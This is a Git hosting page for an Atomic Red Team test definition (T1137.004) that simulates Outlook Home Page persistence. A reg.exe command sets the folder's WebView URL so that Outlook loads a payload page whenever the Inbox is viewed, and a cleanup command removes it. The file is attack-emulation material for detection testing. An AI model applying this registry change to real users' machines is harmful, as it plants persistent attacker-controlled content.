security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
python_conversion
atomic-red-team/atomics/T1137.004/T1137.004.yaml
T
Josh Rickard 284886292b Atomic Red Team - JSON Schema Validation CI (#2303) 
* feat: Adding atomic-red-team JSON Schema defintions

* feat: Adding validate.py script to validate all atomics against the defined schema

* feat: Adding validate-schema GitHub Workflow action to validate on every push to the repo

* ci: Updated the validate-schema workflow to support and use Ruby instead of python

* fix: Updated schema to remove schema draft version (not necessarily needed) and update to remove elevation_required as a required defined property

* fix: Removed the yaml schema version

* docs: Adding start of README

* fix: Adding an updated/better version of the python validation but may ultimately be removed

* feat: Adding Ruby version of validate.rb script

* fix: Removing files not needed since we are changing to github action and using the new validation code

* fix: Adding the yaml schema file back and removed the json version

* docs: Updated README with documentation

* fix: Updating schema to use new format validator

* fix: Updated validate.rb to verify that the Technique IDs are in the correct format.

* fix: Upating validate.rb to raise execptions so that failures flow up to the GitHub Action workflow

* fix: Updated all tests that have input_arguments not conformaing to schema defintion for type value of path

* fix: Updating the Validaton README for typos

* fixL: Minor updates to the schema

* minor schema changes

* github actions fix

* schema changes

---------

Co-authored-by: MSAdministrator <MSAdministrator@users.noreply.github.com>
Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
Co-authored-by: Hare Sudhan <code@0x6c.dev>
2023-05-12 15:33:47 -06:00

39 lines
1.7 KiB
YAML
Raw Permalink Blame History

attack_technique: T1137.004
display_name: "Office Application Startup: Outlook Home Page"
atomic_tests:
- name: Install Outlook Home Page Persistence
auto_generated_guid: 7a91ad51-e6d2-4d43-9471-f26362f5738e
description: |
This test simulates persistence being added to a host via the Outlook Home Page functionality. This causes Outlook to retrieve URL containing a malicious payload every time the targeted folder is viewed.
Triggering the payload requires manually opening Outlook and viewing the targetted folder (e.g. Inbox).
supported_platforms:
- windows
input_arguments:
url:
description: URL to Outlook Home Page containing the payload to execute (can be local file:// or remote https://)
type: string
default: file://PathToAtomicsFolder\T1137.004\src\T1137.004.html
outlook_version:
description: Version of Outlook that is installed
type: float
default: 16.0
# Microsoft 365: 16.0
# Outlook 2019: 16.0
# Outlook 2016: 16.0
# Outlook 2013: 15.0
outlook_folder:
description: Name of the Outlook folder to modify the homepage setting for
type: string
default: Inbox
# Default folder names as they appear in the registry: https://support.microsoft.com/en-us/office/outlook-home-page-feature-is-missing-in-folder-properties-d207edb7-aa02-46c5-b608-5d9dbed9bd04
executor:
name: command_prompt
elevation_required: false
command: |
reg.exe add HKCU\Software\Microsoft\Office\#{outlook_version}\Outlook\WebView\#{outlook_folder} /v URL /t REG_SZ /d #{url} /f
cleanup_command: |
reg.exe delete HKCU\Software\Microsoft\Office\#{outlook_version}\Outlook\WebView\#{outlook_folder} /v URL /f >nul 2>&1
Reference in New Issue View Git Blame Copy Permalink